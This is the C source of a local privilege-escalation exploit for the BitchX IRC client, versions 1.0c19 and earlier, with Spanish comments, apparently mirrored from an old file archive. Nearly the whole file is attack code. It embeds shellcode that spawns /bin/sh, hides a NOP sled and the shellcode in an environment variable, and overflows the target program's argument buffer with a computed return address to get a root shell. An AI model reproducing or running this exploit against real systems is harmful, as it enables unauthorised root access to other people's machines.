home *** CD-ROM | disk | FTP | other *** search
- // BitchX local-root by Sha0 (version 1.0c19 e inferiores -todas-)
- // este exploit se lo dedico a mi chica.
- // 0xC0000000-4-strlen(argv[1])-1-strlen(buffer)
- // 2052 to the ret
-
- #include <stdio.h>
- #include <string.h>
- #include <stdlib.h>
- #include <unistd.h>
-
- char payload[69];
- char sha0code[] =
- "\xeb\x16\x5b\x31\xc0"
- "\x50\x53\xb0\x0b\x89"
- "\xdb\x89\xe1\x31\xd2"
- "\xcd\x80\x31\xc0\x40"
- "\x31\xdb\xcd\x80\xe8"
- "\xe5\xff\xff\xff\x2f"
- "\x62\x69\x6e\x2f\x73\x68";
-
-
- void nopea (void);
-
- int main (int argc, char **argv) {
-
- char *buff;
- char *arg1="bash";
- char *arg2="-c";
- char *arg[]={arg1,arg2,buff,NULL};
- char *env[]={"TERM=xterm",payload,NULL};
- char offset[]="";
- char sret[4];
- unsigned long lret;
- int i;
-
- if (argc != 2) {
- fprintf (stdout,"BitchX exploit Coded By Sha0\n");
- fprintf (stdout,"ej: %s /usr/bin/BitchX\n\n",argv[0]);
- return (1);
- }
-
- buff = (char *)malloc (2100);
- bzero (buff,sizeof(buff));
- arg[2] = buff;
-
- nopea ();
-
- lret = 0xbffffffa - strlen(payload) - strlen(argv[1]);
- sret[0] = (0x000000ff & lret);
- sret[1] = (0x0000ff00 & lret) >> 8;
- sret[2] = (0x00ff0000 & lret) >> 16;
- sret[3] = (0xff000000 & lret) >> 24;
-
- for (i=0;i<2088;i+=4) // 2088 tirando largo.
- memcpy (buff+i,sret,4);
-
- execve (argv[1],arg,env);
- perror ("execve()");
-
- free (buff);
- return (0);
- }
-
-
- void nopea (void) {
- bzero (payload,sizeof(payload));
- memset (payload,0x90,sizeof(payload)-1);
- memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code));
- }
-
